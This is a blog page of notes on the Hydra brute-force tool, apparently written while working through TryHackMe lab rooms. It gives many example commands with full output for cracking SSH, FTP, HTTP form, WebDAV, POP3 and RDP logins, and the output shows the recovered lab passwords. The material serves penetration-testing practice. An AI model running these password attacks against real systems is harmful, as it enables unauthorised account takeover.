Skip to main content

Hydra: Notes

Hydra: Pentesing Hacking Tool - Brute Force password attack

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra)

Hydra source code: https://gitlab.com/kalilinux/packages/hydra

Hydra

hydra -l chris -P /usr/share/wordlists/common.txt ftp://10.10.242.129

Example of ssh login

hydra -l jessie -P /usr/share/wordlists/rockyou.txt 10.10.65.195 ssh

Yet another example of ssh login

target=10.10.33.252
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://$target

Yet another example of ssh login

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:38:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking ssh://10.10.68.186:22/
[22][ssh] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:38:49

# hydra -l noraj -P /usr/share/wordlists/rockyou-12.txt 10.10.93.131 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-13 09:18:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 555079 login tries (l:1/p:555079), ~34693 tries per task
[DATA] attacking ssh://10.10.93.131:22/
[22][ssh] host: 10.10.93.131   login: noraj   password: cheeseburger
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-13 09:19:08
#

Yet another example of ssh login with unnormal port (80 instead of 22)

root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades# hydra -l jack -P jacks_password_list ssh://10.10.148.230 -s 80
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-14 18:30:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.148.230:80/
[80][ssh] host: 10.10.148.230   login: jack   password: REDACTED-PASSWORD
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-14 18:30:07
root@X220:/mnt/d/OneDrive/tryhackme/jackofalltrades#

Example of http-post-form login form

# hydra -l frank -P /usr/share/wordlists/rockyou.txt devguru.local http-post-form "/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect." -s 8585
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-07 11:06:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://devguru.local:8585/user/login:_csrf=dKGSvb5OKXIuMHfMk8UAzVUixME6MTYwNzI2NzQ4MDA1NTQxODg1Ng&user_name=frank&password=^PASS^&loginsubmit=Sign In:Username or password is incorrect.
[STATUS] 259.00 tries/min, 259 tries in 00:01h, 14344140 to do in 923:03h, 16 active
[STATUS] 142.67 tries/min, 428 tries in 00:03h, 14343971 to do in 1675:42h, 16 active
[STATUS] 160.00 tries/min, 1120 tries in 00:07h, 14343279 to do in 1494:06h, 16 active
[STATUS] 129.53 tries/min, 1943 tries in 00:15h, 14342456 to do in 1845:25h, 16 active
[STATUS] 119.97 tries/min, 3719 tries in 00:31h, 14340680 to do in 1992:18h, 16 active
[8585][http-post-form] host: devguru.local   login: frank
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-07 11:46:38
root@T420:/mnt/f/OneDrive/tryhackme/devguru#

Yet another Example of http-post-form login form

# hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.68.186 http-post-form "/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-23 20:33:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-post-form://10.10.68.186:80/login:username=molly&password=^PASS^&loginsubmit=Login:Your username or password is incorrect.
[80][http-post-form] host: 10.10.68.186   login: molly   password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-23 20:33:28
#

Brute force login form Jenkins

root@X220:~ # hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-11 08:58:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[8080][http-post-form] host: localhost   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-11 08:59:38
root@X220:~ #

# ip="deliver.undiscovered.thm"
# hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 19:57:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://deliver.undiscovered.thm:80/cms/index.php:username=admin&userpw=^PASS^&submit=log in:User unknown or password wrong
[80][http-post-form] host: deliver.undiscovered.thm   login: admin   password: liverpool
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 19:57:38
#

Example of brute force WebDAV

hydra -l wampp -P /usr/share/wordlists/rockyou.txt 10.10.178.82 http-get /webdav

Yet another example of brute force WebDAV

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.25.128 http-get /inferno

# hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.234.170 http-head
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-13 15:29:12
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] http-head auth does not work with every server, better use http-get
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-head://10.10.234.170:80/
[STATUS] 1440.00 tries/min, 1440 tries in 00:01h, 14342964 to do in 166:01h, 16 active
[STATUS] 1443.33 tries/min, 4330 tries in 00:03h, 14340074 to do in 165:36h, 16 active
[STATUS] 1421.00 tries/min, 9947 tries in 00:07h, 14334457 to do in 168:08h, 16 active
[80][http-head] host: 10.10.234.170   login: rascal   password: kaylah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-13 15:37:42
#

WebDAV on port 8080

root@T420:~# ip=10.10.66.235
root@T420:~# hydra -l joker -P /usr/share/wordlists/rockyou.txt $ip http-get -s 8080
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-16 12:19:49
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344404 login tries (l:1/p:14344404), ~896526 tries per task
[DATA] attacking http-get://10.10.66.235:8080/
[8080][http-get] host: 10.10.66.235   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-16 12:20:29
root@T420:~#

Example of brute force ftp

root@X220:~# hydra -l jenny -P /usr/share/wordlists/rockyou.txt 10.10.230.70 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-13 18:18:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.230.70:21/
[21][ftp] host: 10.10.230.70   login: jenny   password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-13 18:18:55
root@X220:~#
hydra http-post-form

Example of brute force POP3

# hydra -l boris -P /usr/share/set/src/fasttrack/wordlist.txt pop3://10.10.192.132 -s 55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:23:17
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 10.10.192.132   login: boris   password: secret1!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:26:15
#

Yet another example of brute force POP3

# hydra -l natalya -P /usr/share/set/src/fasttrack/wordlist.txt 10.10.192.132 -s 55007 pop3
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 20:44:48
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://10.10.192.132:55007/
[STATUS] 53.00 tries/min, 53 tries in 00:01h, 169 to do in 00:04h, 16 active
[55007][pop3] host: 10.10.192.132   login: natalya   password: bird
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 20:47:27
#

Example of brute force RDP

root@T420:~# hydra -t 1 -V -f -l jareth -P /usr/share/wordlists/rockyou.txt rdp://10.10.95.189
....
[3389][rdp] account on 10.10.95.189 might be valid but account not active for remote desktop: login: jareth password: sarah, continuing attacking the account.
....

Practice

>>> THM | Library

>>> THM | Jack of All Trades

>>> THM | Advent of Cyber 1 [2019] - Day 17

>>> THM | GoldenEye

>>> THM | Internal

>>> THM | Year of the Owl

>>> THM | HA Joker CTF

Labels:

Popular posts from this blog

IIS: Delete cached files on server running IIS

Delete cached files on server running IIS When changing css, javascript files, check to delete if IIS still caches old files in the default folder C:\inetpub\temp\IIS Temporary Compressed Files\<sitename>\$^_gzip_D^\ Apply to: IIS 8.5
Read more

Linux command: du - disk usage

Where have all my storage gone? du summarize disk usage of the set of FILEs, recursively for directories.
Read more

ManageEngine ServiceDesk Plus - Reset password

Let's reset the default administrator's password to 'admin'
Read more